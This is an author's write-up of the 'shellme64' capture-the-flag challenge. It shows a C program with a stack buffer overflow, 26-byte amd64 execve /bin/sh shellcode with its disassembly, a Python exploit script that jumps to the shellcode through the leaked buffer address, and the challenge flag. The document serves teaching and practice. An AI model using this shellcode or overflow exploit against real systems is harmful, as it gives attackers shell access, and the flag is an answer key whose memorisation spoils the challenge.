# Shellme64 Author Writeup

## Description

Same concept, more bytes

*Hint:* Just like x86 with some different registers.

## A Word From The Author

Shellcode is fun, but it can fail for pretty unknown reasons (at least unkown to me). The point of this challenge, and it’s parter in crime: shellme32, is to get people comfortable/familiar with shellcode execution and hopefully find some shellcode they like.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	char username[32];
	printf("Hey! I think you dropped this\n%p\n> ", username);
	read(0, username, 64);


    return 0;
}
```

![info.png](./res/47d56bd8983940d4b286bbbbd8d56a90.png)

![same_thing.gif](http://iiquotes.com/wp-content/uploads/2016/08/22-jump-street-quotes-12.gif)


Like the man said, same challenge... more bytes. I went into more depth on shellcode in the **shellme32** writeup. Here I'll just explain that which makes 64bit shellcode unique.

64bit shellcode is mostly the same as 32bit in terms of the flow of execution and understand fundamental concepts. The only huge differences are the size of operations, registers used, and execution of the syscall. Whereass x86 uses `int 0x80`, amd64 will use `syscall`. Anyways, here's the shellcode I find most reliable (it's my adaptation of the 32bit shellcode from the previous challenge):

### THPOONS's "execve /bin/sh" Shellcode

* Bytes: 26

```sh
\x48\x31\xF6\x48\x31\xD2\x56\x49\xB8\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x41\x50\x48\x89\xE7\xB0\x3B\x0F\x05
```

```asm
0:  48 31 f6                xor    rsi,rsi
3:  48 31 d2                xor    rdx,rdx
6:  56                      push   rsi
7:  49 b8 2f 62 69 6e 2f    movabs r8,0x68732f2f6e69622f
e:  2f 73 68
11: 41 50                   push   r8
13: 48 89 e7                mov    rdi,rsp
16: b0 3b                   mov    al,0x3b
18: 0f 05                   syscall
```

### Important Syscalls

Reference for references sake, here's a list of the most common/important syscalls

| rax | System call | rdi | rsi | rdx | r10 | r8 | r9 |
| --------- | ------------ | --------------------------------------------- | ----------------------- | --- | --- | --- | --- |
| 0 | sys_read | unsigned int fd | char *buf | size_t count |  |  |  |
| 1 | sys_write | unsigned int fd | const char *buf | size_t count |  |  |  |
| 2 | sys_open | const char *filename | int flags | int mode |  |  |  |
| 3 | sys_close | unsigned int fd |  |  |  |  |  |
| 59 | sys_execve | const char *filename | const char *const argv[] | const char *const envp[] |  |  |  |
| 60 | sys_exit | int error_code |  |  |  |  |  |

Using my awesome shellcode,let's slap it in a script and see what we get shall we.

## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30507',
    localcmd =  './shellme64',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
pad = 40

# Get stack address of our buffer
p.recvuntil('\n')
stack = p64(int(p.recvuntil('\n'), 16))
p.recv()

sc = "\x48\x31\xF6\x48\x31\xD2\x56\x49\xB8\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x41\x50\x48\x89\xE7\xB0\x3B\x0F\x05"

payload = sc
payload += 'A'*(pad-len(payload))
payload += stack

p.send(payload)
p.interactive()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![exploit.png](./res/beab811454994e13b88acf0381520011.png)

## Endgame

PWN challenges don't always change when switching from 32 to 64bit. But when they do it's a lot of fun. Happy pwning!

> **flag:** TUCTF{54m3_5h3llc0d3,_ju57_m0r3_by735}

